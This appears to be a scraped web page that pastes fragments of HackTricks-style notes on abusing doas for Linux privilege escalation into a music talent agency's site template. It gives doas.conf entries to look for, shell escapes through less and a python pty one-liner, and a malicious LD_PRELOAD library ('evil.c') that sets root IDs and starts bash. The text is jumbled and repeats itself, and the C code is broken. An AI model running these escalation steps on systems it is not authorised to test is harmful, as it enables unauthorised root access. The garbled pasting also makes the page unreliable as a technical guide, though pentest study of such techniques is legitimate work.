Skip to content

Hacktricks Doas -

permit user1 as root cmd /usr/bin/less doas less /etc/hosts # then type: !/bin/bash Known binaries for escapes: less , more , vi , vim , nano , awk , find , man , git , tmux , screen , ftp , irb , lua , perl , python , ruby , scp , tar . If keepenv is set, doas keeps LD_PRELOAD , LD_LIBRARY_PATH , PYTHONPATH , etc.

permit nopass user1 as root cmd /usr/bin/* Try:

permit keepenv user1 as root Compile a malicious lib: hacktricks doas

In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf

doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")' Many binaries allow shell escapes. permit user1 as root cmd /usr/bin/less doas less

// evil.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init() setuid(0); setgid(0); system("/bin/bash");

— HackTricks Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives. doas was originally from OpenBSD

Keep hacking. Keep escalating.

hacktricks doas

SIGN UP TODAY

Join our list to receive the latest touring news and info from Universal Attractions Agency

Name
This field is for validation purposes and should be left unchanged.
TOURING ARTIST ROSTER
Envelope Instagram Facebook

© 2024 Universal Attractions, Inc. D/B/A UAA

Universal Attractions is Registered with New York Department of Consumer Affairs / UAA is a wholly owned brand name of Universal Attractions, Inc.